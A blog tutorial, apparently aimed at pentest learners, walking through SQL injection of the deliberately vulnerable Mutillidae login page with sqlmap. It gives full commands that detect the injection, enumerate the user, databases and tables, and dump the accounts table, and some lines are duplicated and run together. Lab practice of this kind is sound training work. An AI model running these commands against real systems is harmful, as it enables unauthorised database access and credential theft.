- XAMPP (All-in-one Web Server and Database Server with PHP)
- Mutillidae (Purposely insecure PHP site created by Irongeek)
Running on Attacker’s System
- Backtrack 4 Beta (Linux Distro for Pentesters)
- ParosProxy (Web proxy program for examining web traffic) Installed on Backtrack 4
- SQLmap 0.6-rc5 (Automated SQL injection program) Installed on Backtrack 4
**Before you begin make sure you have ParosProxy running and your web browser pointing to it**
The first thing we do is browse to the site. I will be testing the login form on the login.php page.
Before we login, lets look at the source code for the login form.
As you can see there are three input variables: user_name, password, and submit_button.
We also notice the method is POST (which is why we are using it for this example).
Now you can login. I will use the admin account to login. You could use any account though.
Username: admin
Password: adminpass
It isn’t really that necessary to log into the site, but I want to show
you the POST variables as they are passed to the server within
ParosProxy. Also, for this particular exercise, you will have to provide
a valid username and password for the injection to work correctly in
SQLmap. So, you might as well make sure it works. Again you don’t have
to use the admin account, you could even register a user first and then
use that account.
And the page that tells me I have logged in successfully.
Ok, now the we have successfully logged into the site, lets check Paros to see how that data was sent via the POST method.
As you can see the format of the post variables is as follows:
OK, now fireup sqlmap from a terminal. To make sqlmap check POST variables you need to specify the
user_name=admin&password=adminpass&Submit_button=SubmitOK, now fireup sqlmap from a terminal. To make sqlmap check POST variables you need to specify the
--method "POST"switch followed by the--dataswitch.
Here is the whole command for this example (notice how the POST data from Paros is supplied directly to the “–data” switch):
python
sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php"
--method "POST" --data
"user_name=admin&password=adminpass&Submit_button=Submit"
It worked. sqlmap detected the remote database server is MySQL ver. 5.X.X
That is pretty much it, but just for fun lets enumerate some of the data. Lets check to see who the current user is:
python
sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php"
--method "POST" --data
"user_name=admin&password=adminpass&Submit_button=Submit"
--current-user
Alright! running as root…that is convenient. Let’s see the databases:
python
sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php"
--method "POST" --data
"user_name=admin&password=adminpass&Submit_button=Submit" --dbs
OK, lets check out “owasp10″ since that is the database for the mutillidae website:
python
sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php"
--method "POST" --data
"user_name=admin&password=adminpass&Submit_button=Submit"
--tables -D owasp10
Ooo…the “accounts” table looks interesting let’s get the data:
Watch Video Trailer on Youtube
Posted ByNishobdo pothik
python
sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php"
--method "POST" --data
"user_name=admin&password=adminpass&Submit_button=Submit" -D
owasp10 -T accounts --dumpWatch Video Trailer on YoutubePosted ByNishobdo pothik
No comments:
Post a Comment